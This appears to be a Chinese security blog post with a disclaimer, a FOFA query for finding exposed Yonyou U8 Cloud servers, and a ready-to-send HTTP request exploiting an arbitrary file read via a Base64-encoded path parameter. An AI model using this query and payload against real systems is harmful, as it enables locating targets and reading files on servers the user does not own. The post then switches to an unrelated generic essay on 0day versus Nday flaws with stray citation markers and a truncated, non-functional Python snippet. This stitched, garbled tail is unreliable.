声明：亲爱的读者，我们诚挚地提醒您，Aniya 网络安全 的技术文章仅供个人研究学习参考。任何因传播或利用本实验室提供的信息而造成的直接或间接后果及损失，均由使用者自行承担责任。Aniya 网络安全 及作者对此概不负责。如有侵权，请立即告知，我们将立即删除并致歉。感谢您的理解与支持！

0x01：FOFA语句

app="用友-U8-Cloud"

0x02：漏洞POC

对路径进行Base64编码

GET /service/~hrpub/nc.bs.hr.tools.trans.FileServlet?path=QzovL3dpbmRvd3Mvd2luLmluaQ== HTTP/1.1
Host: IP/HOSt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

直接发包测试

#### 定义差异 0day 漏洞 指的是尚未公开且未有补丁的 安全 缺陷，这类 漏洞 仅被少数人知晓，在官方发布修复方案前处于隐蔽状态[^ 2 ]。而 Nday 漏洞 则是指那些已被公布，并存在已知解决方案或补丁的 漏洞 ，意味着这些 漏洞 的信息透明度较高，社区和厂商已有相应的防护手段[^1]。 #### 特点对比 - **隐秘性** 对于0day 漏洞 而言，由于其未知特性，使得攻击者可以在不被察觉的情况下实施攻击；相比之下， Nday 漏洞 因信息公开，防御方可以提前部署防范措施[^3]。 - **生命周期** 0day 漏洞 一旦被披露便迅速转变为 Nday 漏洞 ，此时 安全 团队能够及时响应并提供更新来修补该问题。然而，在成为公众知识之前的时间窗口内，0day 漏洞 对目标系统构成潜在威胁。 - **影响范围** 新近发现的0day 漏洞 可能针对特定软件版本或配置环境造成严重影响，而随着时间推移变成 Nday 之后，则更多依赖于用户的升级情况决定实际受影响程度。 #### 安全 应对策略 面对这两种类型的 漏洞 ，采取不同的预防机制至关重要： - 对于0day 漏洞 ，建议保持警惕的态度，定期关注行业动态和技术论坛上的最新消息，以便尽早识别潜在风险。同时加强内部 网络安全 监测能力，通过入侵检测系统 ( IDS ) /入侵防御系统 ( IPS ) 等工具捕捉异常活动迹象。 - 针对 Nday 漏洞 ，应建立快速反应流程，确保能够在第一时间获取到最新的 安全 公告以及对应的修复包。此外，还应该制定详细的应急预案，当遇到无法即时打上补丁的情况时，可以通过临时性的缓解方法减少暴露面，比如调整防火墙规则、关闭不必要的服务端口等方式降低受攻击的可能性。 ```python def check_vulnerability ( vuln_type ) : 检查是否存在指定类型的 漏洞 vuln_type ( str ) : '0day' 或 ' nday ' bool: 如果存在返回True, 否则False if vuln_type == "0day": # 实现针对0day 漏洞 的特殊检查逻辑 elif vuln_type == " nday ": # 使用常规扫描工具查找已知 漏洞